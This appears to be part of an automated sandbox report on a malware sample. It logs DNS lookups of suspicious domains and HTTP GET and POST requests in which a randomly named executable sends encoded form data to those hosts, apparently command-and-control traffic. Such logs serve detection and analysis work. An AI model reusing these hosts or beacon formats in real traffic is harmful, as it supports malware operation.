                    Sep 12, 2024 13:04:46.012864113 CEST8049745104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:46.012900114 CEST8049745104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:46.013072968 CEST4974580192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:46.017503977 CEST4974580192.168.2.5104.21.20.125
                    Sep 12, 2024 13:04:46.022346020 CEST8049745104.21.20.125192.168.2.5
                    Sep 12, 2024 13:04:51.988152027 CEST4974680192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:51.993184090 CEST804974643.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:51.997229099 CEST4974680192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:52.008840084 CEST4974680192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:52.013825893 CEST804974643.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:52.881658077 CEST804974643.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:52.882936001 CEST804974643.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:52.882989883 CEST4974680192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:53.512058020 CEST4974680192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:54.531390905 CEST4974780192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:54.536308050 CEST804974743.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:54.536401033 CEST4974780192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:54.549732924 CEST4974780192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:54.554667950 CEST804974743.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:55.402774096 CEST804974743.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:55.403001070 CEST804974743.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:55.403764009 CEST4974780192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:56.059609890 CEST4974780192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:57.084503889 CEST4974880192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:57.089488983 CEST804974843.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:57.089565039 CEST4974880192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:57.113065004 CEST4974880192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:57.118006945 CEST804974843.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:57.118232965 CEST804974843.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:58.135854959 CEST804974843.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:58.136020899 CEST804974843.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:58.136055946 CEST804974843.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:58.136095047 CEST4974880192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:58.136279106 CEST4974880192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:58.621349096 CEST4974880192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:59.642354965 CEST4974980192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:59.647432089 CEST804974943.242.202.169192.168.2.5
                    Sep 12, 2024 13:04:59.650449038 CEST4974980192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:59.659583092 CEST4974980192.168.2.543.242.202.169
                    Sep 12, 2024 13:04:59.664566994 CEST804974943.242.202.169192.168.2.5
                    Sep 12, 2024 13:05:00.602796078 CEST804974943.242.202.169192.168.2.5
                    Sep 12, 2024 13:05:00.602822065 CEST804974943.242.202.169192.168.2.5
                    Sep 12, 2024 13:05:00.602834940 CEST804974943.242.202.169192.168.2.5
                    Sep 12, 2024 13:05:00.602957964 CEST4974980192.168.2.543.242.202.169
                    Sep 12, 2024 13:05:00.606075048 CEST4974980192.168.2.543.242.202.169
                    Sep 12, 2024 13:05:00.613368034 CEST804974943.242.202.169192.168.2.5

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 12, 2024 13:02:33.774221897 CEST5318353192.168.2.51.1.1.1
                    Sep 12, 2024 13:02:33.783813953 CEST53531831.1.1.1192.168.2.5
                    Sep 12, 2024 13:02:38.798022032 CEST5760353192.168.2.51.1.1.1
                    Sep 12, 2024 13:02:38.812272072 CEST53576031.1.1.1192.168.2.5
                    Sep 12, 2024 13:02:54.765254021 CEST5027453192.168.2.51.1.1.1
                    Sep 12, 2024 13:02:54.816309929 CEST53502741.1.1.1192.168.2.5
                    Sep 12, 2024 13:03:08.109097004 CEST5567453192.168.2.51.1.1.1
                    Sep 12, 2024 13:03:08.119434118 CEST53556741.1.1.1192.168.2.5
                    Sep 12, 2024 13:03:16.171837091 CEST5409853192.168.2.51.1.1.1
                    Sep 12, 2024 13:03:16.351845026 CEST53540981.1.1.1192.168.2.5
                    Sep 12, 2024 13:03:29.953356981 CEST6249453192.168.2.51.1.1.1
                    Sep 12, 2024 13:03:30.163310051 CEST53624941.1.1.1192.168.2.5
                    Sep 12, 2024 13:03:43.565097094 CEST6195553192.168.2.51.1.1.1
                    Sep 12, 2024 13:03:43.621608973 CEST53619551.1.1.1192.168.2.5
                    Sep 12, 2024 13:03:56.969422102 CEST5903553192.168.2.51.1.1.1
                    Sep 12, 2024 13:03:56.991231918 CEST53590351.1.1.1192.168.2.5
                    Sep 12, 2024 13:04:10.266396999 CEST5939653192.168.2.51.1.1.1
                    Sep 12, 2024 13:04:10.466754913 CEST53593961.1.1.1192.168.2.5
                    Sep 12, 2024 13:04:23.758407116 CEST6090653192.168.2.51.1.1.1
                    Sep 12, 2024 13:04:24.019242048 CEST53609061.1.1.1192.168.2.5
                    Sep 12, 2024 13:04:37.738338947 CEST5821053192.168.2.51.1.1.1
                    Sep 12, 2024 13:04:37.761276960 CEST53582101.1.1.1192.168.2.5
                    Sep 12, 2024 13:04:51.032418966 CEST5078253192.168.2.51.1.1.1
                    Sep 12, 2024 13:04:51.935170889 CEST53507821.1.1.1192.168.2.5
                    Sep 12, 2024 13:05:05.999725103 CEST6244153192.168.2.51.1.1.1
                    Sep 12, 2024 13:05:06.011758089 CEST53624411.1.1.1192.168.2.5

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Sep 12, 2024 13:02:33.774221897 CEST192.168.2.51.1.1.10xf80fStandard query (0)www.monos.shopA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:02:38.798022032 CEST192.168.2.51.1.1.10xcda3Standard query (0)www.726075.buzzA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:02:54.765254021 CEST192.168.2.51.1.1.10x8015Standard query (0)www.freepicture.onlineA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:08.109097004 CEST192.168.2.51.1.1.10x33deStandard query (0)www.318st.comA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:16.171837091 CEST192.168.2.51.1.1.10x5809Standard query (0)www.hm62t.topA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:29.953356981 CEST192.168.2.51.1.1.10x191Standard query (0)www.golbasi-nakliyat.xyzA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:43.565097094 CEST192.168.2.51.1.1.10x4ca0Standard query (0)www.mfgamecompany.shopA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:56.969422102 CEST192.168.2.51.1.1.10xf7a9Standard query (0)www.quilo.lifeA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:10.266396999 CEST192.168.2.51.1.1.10x5f96Standard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:23.758407116 CEST192.168.2.51.1.1.10xa54dStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:37.738338947 CEST192.168.2.51.1.1.10xa1c9Standard query (0)www.kckartal.xyzA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:51.032418966 CEST192.168.2.51.1.1.10x3fb2Standard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:05:05.999725103 CEST192.168.2.51.1.1.10xcd3bStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Sep 12, 2024 13:02:33.783813953 CEST1.1.1.1192.168.2.50xf80fName error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:02:38.812272072 CEST1.1.1.1192.168.2.50xcda3No error (0)www.726075.buzz47.57.185.227A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:02:54.816309929 CEST1.1.1.1192.168.2.50x8015No error (0)www.freepicture.onlinefreepicture.onlineCNAME (Canonical name)IN (0x0001)false
                    Sep 12, 2024 13:02:54.816309929 CEST1.1.1.1192.168.2.50x8015No error (0)freepicture.online89.58.49.1A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:08.119434118 CEST1.1.1.1192.168.2.50x33deName error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:16.351845026 CEST1.1.1.1192.168.2.50x5809No error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
                    Sep 12, 2024 13:03:16.351845026 CEST1.1.1.1192.168.2.50x5809No error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:30.163310051 CEST1.1.1.1192.168.2.50x191No error (0)www.golbasi-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                    Sep 12, 2024 13:03:30.163310051 CEST1.1.1.1192.168.2.50x191No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                    Sep 12, 2024 13:03:30.163310051 CEST1.1.1.1192.168.2.50x191No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:43.621608973 CEST1.1.1.1192.168.2.50x4ca0No error (0)www.mfgamecompany.shopmfgamecompany.shopCNAME (Canonical name)IN (0x0001)false
                    Sep 12, 2024 13:03:43.621608973 CEST1.1.1.1192.168.2.50x4ca0No error (0)mfgamecompany.shop185.173.111.76A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:03:56.991231918 CEST1.1.1.1192.168.2.50xf7a9No error (0)www.quilo.life203.161.43.228A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:10.466754913 CEST1.1.1.1192.168.2.50x5f96No error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:24.019242048 CEST1.1.1.1192.168.2.50xa54dNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                    Sep 12, 2024 13:04:24.019242048 CEST1.1.1.1192.168.2.50xa54dNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:37.761276960 CEST1.1.1.1192.168.2.50xa1c9No error (0)www.kckartal.xyz104.21.20.125A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:37.761276960 CEST1.1.1.1192.168.2.50xa1c9No error (0)www.kckartal.xyz172.67.192.227A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:04:51.935170889 CEST1.1.1.1192.168.2.50x3fb2No error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                    Sep 12, 2024 13:05:06.011758089 CEST1.1.1.1192.168.2.50xcd3bName error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • www.726075.buzz
                    • www.freepicture.online
                    • www.hm62t.top
                    • www.golbasi-nakliyat.xyz
                    • www.mfgamecompany.shop
                    • www.quilo.life
                    • www.qiluqiyuan.buzz
                    • www.bola88site.one
                    • www.kckartal.xyz
                    • www.mizuquan.top

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.54971147.57.185.227804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:02:38.835670948 CEST458OUTGET /w9nd/?nR=9dRK0h7YIJsGSRni8bUofvVG/PCfrhvBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtsDQ0fsSUzmOhwAoGTPqsz12jBMJXijf4AdQEcpHIqPDRWg==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.726075.buzz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:02:39.719141960 CEST302INHTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Thu, 12 Sep 2024 11:02:39 GMT
                    Content-Type: text/html
                    Content-Length: 138
                    Connection: close
                    ETag: "6663edd0-8a"
                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.54971289.58.49.1804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:02:54.834352970 CEST742OUTPOST /xcfw/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Origin: http://www.freepicture.online
                    Referer: http://www.freepicture.online/xcfw/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 203
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 4b 54 4e 6f 51 52 43 72 45 71 4f 72 64 68 6e 39 6a 56 52 37 71 69 76 42 79 66 38 43 37 72 65 76 76 57 46 70 32 38 3d
                    Data Ascii: nR=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqKTNoQRCrEqOrdhn9jVR7qivByf8C7revvWFp28=
                    Sep 12, 2024 13:02:55.453418970 CEST360INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:02:55 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.54971489.58.49.1804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:02:57.372428894 CEST762OUTPOST /xcfw/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Origin: http://www.freepicture.online
                    Referer: http://www.freepicture.online/xcfw/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 223
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 59 2f 48 32 58 4d 33 43 6b 44 31 34 63 63 34 4b 6d 31 5a 4c 2b 44 47 58 48 69 49 53 32 79 4b 44 39 39 74 67 67 36 43 33 78 70 6f 69 2f 46 44 64 35 52 52 4e 4b 42 6d 69 50 54 46 43 68 48 33 61 6c 46 69 78 34 34 58 33 55 52 32 41 77 4b 37 68 48 56 5a 56 4c 53 31 49 5a 75 58 66 56 65 69 38 65 44 49 78 6b 58 4a 69 39 6e 65 72 58 70 74 49 78 37 55 6e 76 4b 6a 61 66 64 6e 43 45 36 2b 48 32 4f 6e 4c 4d 4e 6e 42 64 35 6f 4b 4f 58 52 68 58 4c 54 4c 4b 33 31 4d 47 31 33 68 71 30 74 67 4a 6c 66 46 77 79 49 4c 79 61 4c 68 49 62 76 56 46 64
                    Data Ascii: nR=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GY/H2XM3CkD14cc4Km1ZL+DGXHiIS2yKD99tgg6C3xpoi/FDd5RRNKBmiPTFChH3alFix44X3UR2AwK7hHVZVLS1IZuXfVei8eDIxkXJi9nerXptIx7UnvKjafdnCE6+H2OnLMNnBd5oKOXRhXLTLK31MG13hq0tgJlfFwyILyaLhIbvVFd
                    Sep 12, 2024 13:02:58.013906002 CEST360INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:02:57 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.54971589.58.49.1804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:02:59.938705921 CEST1779OUTPOST /xcfw/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Origin: http://www.freepicture.online
                    Referer: http://www.freepicture.online/xcfw/
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 1239
                    Cache-Control: max-age=0
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Data Raw: 6e 52 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 48 65 4f 6b 38 4a 50 79 68 52 42 39 72 36 6e 42 67 57 33 4e 2f 47 52 7a 38 47 44 39 42 79 78 6b 79 6c 30 63 31 63 47 65 37 6a 71 5a 6e 45 72 6f 6a 56 63 43 67 79 44 65 4c 71 57 34 4d 36 79 2b 70 34 34 52 51 4a 63 33 31 6a 65 4e 4c 38 54 72 79 4c 76 35 31 6b 6f 78 50 62 51 66 4c 6f 73 5a 7a 32 68 72 37 4c 55 5a 4a 54 68 55 4c 4e 43 49 41 34 48 59 6b 75 48 45 34 41 6e 2f 4d 33 36 55 56 61 69 61 58 4a 2b 62 70 65 4a 49 37 6d 38 78 39 76 43 4f 45 4e 34 45 4f 36 6e 51 75 46 77 6e 4f 32 43 41 42 6b [TRUNCATED]
                    Data Ascii: nR=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GQ/HjbM2lQD04cc7Km0ZL/GGXvmISqIKB19tCo6VyRpii/FBd5MftLbmifMFCxH3alFi3U4eGURwAwJ8hHZT1K/1IQVXeUljN+DIV4XanRnRrXnqIxdUnjVjaDRnDwc+HeOk8JPyhRB9r6nBgW3N/GRz8GD9Byxkyl0c1cGe7jqZnErojVcCgyDeLqW4M6y+p44RQJc31jeNL8TryLv51koxPbQfLosZz2hr7LUZJThULNCIA4HYkuHE4An/M36UVaiaXJ+bpeJI7m8x9vCOEN4EO6nQuFwnO2CABka0dAYbWa8TXvCpGx28ua43RY2bc4WhMOHZXeDqXFiBUbRODahwCN34K+hxYcFmLUPii0pJTHQVsLfiRFq6gi7CLrMD0CLnt1cNulbG0h7AKIA+iPYhymTWcaDpMHl1elbnHpIC+6exNj2O3gw7F1moDwlzt0AGg5S4PxNU1GeBC8OeJ58Uf9a2PU9wrncY85OkxPfkDueg2vFKwbRVU/PDl6FnZcVjkQ8MU0PfCSzCSh1F2H6Dtx47fop1vbtCfVpuY+94l2rRp7t65lje1FmhbDdhALR0I/3ILNd9t/b/5IQiyPj46B+FkOscJV3HvmMYeRZ9TfRoNknS5ywH7cu/Sd4QfErTcvLri/Wh6JVyPv0QG43hU165ulJjW6tGxUIeKleKwtn+M++BBa2ZfonknpBuImQtSYRoo4m7qM0LrdL/KJTYjnalVfnPtt4micvP+3KXWuyQuIFqMRkHxT/3+XFMdlpx26dFoJ+xUTIG7Ou8O5ichg+Xrkl5x5En9VFTU5W+L9xsmlUIy6nmuTWpKEHRE+esCwxeewQa6MUZ1OmlTzobwSDYoTi2AU4K+D/CukU8aEJZJWDVTjTsDxHMfV1Kr0q9y14gjoZYgEafOvZBP/bGSAK9K5FGwA+Ca46R1IKwjbbnoHJMBu3VmUrbYicHN+Wc+F/M [TRUNCATED]
                    Sep 12, 2024 13:03:00.542438984 CEST360INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:03:00 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.54971689.58.49.1804444C:\Program Files (x86)\NQYTRnWIiuJOUEWgQEwASfTXdsVWoLAPmmcCYiVTEDHRxoYWelqNGDklQolmWQDxcVqnqESI\CjeBlighAyoJst.exe
                    TimestampBytes transferredDirectionData
                    Sep 12, 2024 13:03:02.483143091 CEST465OUTGET /xcfw/?nR=bjW1F6zberoR1D3bw3FdYWJ+vrSF97RpHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFA2CDhFv5wQZ64tx6dBz0c4KNQxRUIYxJE7HIG/DzEWEHYrw==&OJ=btRp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                    Accept-Language: en-US,en
                    Host: www.freepicture.online
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                    Sep 12, 2024 13:03:03.101243019 CEST360INHTTP/1.1 404 Not Found
                    Date: Thu, 12 Sep 2024 11:03:03 GMT
                    Server: Apache
                    Content-Length: 196
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


